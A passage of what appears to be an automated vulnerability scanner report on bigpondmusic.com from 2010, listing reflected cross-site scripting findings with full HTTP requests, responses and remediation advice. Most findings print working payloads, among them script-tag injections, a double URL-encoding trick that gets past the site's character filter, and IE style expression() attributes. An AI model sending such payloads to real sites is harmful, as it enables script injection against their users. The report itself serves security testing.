p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 97573


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Far East Movement - Like a G
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/far-east-movement/like-a-g6?878a2"style="x:expression(alert(1))"ab522009b4e=1" />
...[SNIP]...

2.50. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3 was submitted in the REST URL parameter 1. This input was echoed as dc86a"><script>alert(1)</script>1869074cf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumdc86a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1869074cf3/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumdc86a"><script>alert(1)</script>1869074cf3/glee-cast/glee-the-music-the-christmas-album" />
...[SNIP]...

2.51. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41244'%3baf912ffdfba was submitted in the REST URL parameter 1. This input was echoed as 41244';af912ffdfba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album41244'%3baf912ffdfba/glee-cast/glee-the-music-the-christmas-album HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album41244';af912ffdfba';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.52. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61097"style%3d"x%3aexpression(alert(1))"481039f11e9 was submitted in the h parameter. This input was echoed as 61097"style="x:expression(alert(1))"481039f11e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style%3d"x%3aexpression(alert(1))"481039f11e9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?h=76603962461097"style="x:expression(alert(1))"481039f11e9" />
...[SNIP]...

2.53. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b176"style="x:expression(alert(1))"314c9adb4aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album?9b176"style%3d"x%3aexpression(alert(1))"314c9adb4aa=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album?9b176"style="x:expression(alert(1))"314c9adb4aa=1" />
...[SNIP]...

2.54. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe was submitted in the REST URL parameter 1. This input was echoed as e4974"><script>alert(1)</script>0f5d7856cbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albume4974%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albume4974"><script>alert(1)</script>0f5d7856cbe/glee-cast/glee-the-music-the-christmas-album/" />
...[SNIP]...

2.55. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd58'%3bb759352d2a7 was submitted in the REST URL parameter 1. This input was echoed as 1bd58';b759352d2a7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1bd58'%3bb759352d2a7/glee-cast/glee-the-music-the-christmas-album/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1bd58';b759352d2a7';
   s.prop4 = 'glee-cast';
   s.prop5 = 'glee-the-music-the-christmas-album';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.p
...[SNIP]...

2.56. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 was submitted in the cid parameter. This input was echoed as a07ef"style="x:expression(alert(1))"21c6a478415 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style%3d"x%3aexpression(alert(1))"21c6a478415 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123535


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?cid=gleexmasa07ef"style="x:expression(alert(1))"21c6a478415" />
...[SNIP]...

2.57. http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/glee-cast/glee-the-music-the-christmas-album/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb638"style="x:expression(alert(1))"8fd9221ba73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/glee-cast/glee-the-music-the-christmas-album/?eb638"style%3d"x%3aexpression(alert(1))"8fd9221ba73=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123075


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Glee Cast - Glee: The Music,
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/glee-cast/glee-the-music-the-christmas-album/?eb638"style="x:expression(alert(1))"8fd9221ba73=1" />
...[SNIP]...

2.58. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1bf9'%3b287a2412129 was submitted in the REST URL parameter 1. This input was echoed as c1bf9';287a2412129 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc1bf9'%3b287a2412129/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc1bf9';287a2412129';
   s.prop4 = 'grinderman';
   s.prop5 = 'worm-tamer';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '
...[SNIP]...

2.59. http://bigpondmusic.com/album/grinderman/worm-tamer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e was submitted in the REST URL parameter 1. This input was echoed as 95602"><script>alert(1)</script>bd7e35b9c6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album95602%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd7e35b9c6e/grinderman/worm-tamer HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:26:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album95602"><script>alert(1)</script>bd7e35b9c6e/grinderman/worm-tamer" />
...[SNIP]...

2.60. http://bigpondmusic.com/album/grinderman/worm-tamer [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2673"style%3d"x%3aexpression(alert(1))"545b5603757 was submitted in the h parameter. This input was echoed as d2673"style="x:expression(alert(1))"545b5603757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/grinderman/worm-tamer?h=764552781d2673"style%3d"x%3aexpression(alert(1))"545b5603757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 106667


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Grinderman - Worm Tamer - Bi
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/grinderman/worm-tamer?h=764552781d2673"style="x:expression(alert(1))"545b5603757" />
...[SNIP]...

2.61. http://bigpondmusic.com/album/grinderman/worm-tamer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/grinderman/worm-tamer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f27a"style%3d"x%3aexpression(alert(1))"0807d081f23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f27a"style="x:expression(alert(1))"0807d081f23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

